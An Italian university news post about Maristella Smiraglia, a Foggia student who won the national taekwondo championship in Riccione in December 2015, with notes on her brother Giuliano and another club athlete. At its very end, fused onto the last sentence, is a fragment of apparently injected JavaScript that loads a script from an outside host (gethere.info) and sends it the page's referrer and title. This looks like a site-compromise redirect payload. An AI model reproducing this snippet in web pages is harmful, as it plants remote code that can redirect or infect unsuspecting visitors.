.
News
  • Home

Maristella Smiraglia, studentessa e atleta d’oro!

di trarre 0
17 Dic 2015

L’avevamo lasciata, a maggio, sul gradino più importante dei Campionati Nazionali Universitari.

Medaglia rigorosamente e meritatamente d’oro al collo, gli occhi pieni di felicità e la grande soddisfazione, condivisa con tutta la squadra, di aver portato in alto i colori del Cus Foggia e dell’Università di Foggia.
La ritroviamo di nuovo lì, sul gradino più importante, con un’altra medaglia rigorosamente e meritatamente d’oro. Da Salsomaggiore a Riccione, dai Cnu ai Campionati Italiani di Taekwondo, la storia non cambia.

Maristella Smiraglia si è riconfermata campionessa italiana grazie alla vittoria dei campionati nazionali di Taekwondo, svoltisi nella cittadina romagnola sabato 12 e domenica 13 dicembre.

L’atleta azzurra del Centro Taekwondo Foggia Team Smiraglia è stata protagonista assoluta della massima competizione nazionale, in cui si incontrano i migliori atleti nostrani. Maristella ha dimostrato ancora una volta tutto il suo valore frutto di grande tecnica, forza di volontà e grande esperienza, nonostante la sua giovane età.

183 cm di forza e altezza, lunghe leve e grinta da vendere: Smiraglia ha regalato un grande spettacolo deliziando i tanti presenti al palazzetto di Riccione, battendo due delle avversarie per ko tecnico (cioè per una differenza di 12 punti) finendo i combattimenti già al secondo round. Un risultato che certamente avrà catturato l’attenzione dell’allenatore della nazionale, Yoon Soon Cheul, osservatore interessato per le future convocazioni nella squadra azzurra.

Vittoria e medaglia con tanto di dedica, tutta in famiglia, per papà Ugo, maestro di vita e di sport, e al fratello Giuliano, compagno di allenamenti quotidiani e sparring partner prezioso per raggiungere il massimo della condizione fisica e mentale.
Maristella Smiraglia, vanto del Cus Foggia e dell’Università di Foggia, è iscritta al CdL in Scienze delle Attività Motorie e Sportive. Campionessa nello sport e studentessa modello, in perfetta regola con gli esami, Maristella incarna perfettamente l’idea di studente atleta promossa dall’UniFg.
Alla kermesse di Riccione ha partecipato anche Giuliano Smiraglia, limitato da un infortunio al ginocchio che ne ha compromesso il percorso in gara, uscito dalla competizione al termine del secondo incontro, perso al golden point. Resta comunque la soddisfazione per un rientro comunque positivo dopo un lungo periodo di pausa dalle competizioni. Altro atleta in gara è stato Luigi Paciello, fuori dal podio nonostante le sue indubbie e grandi capacità.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;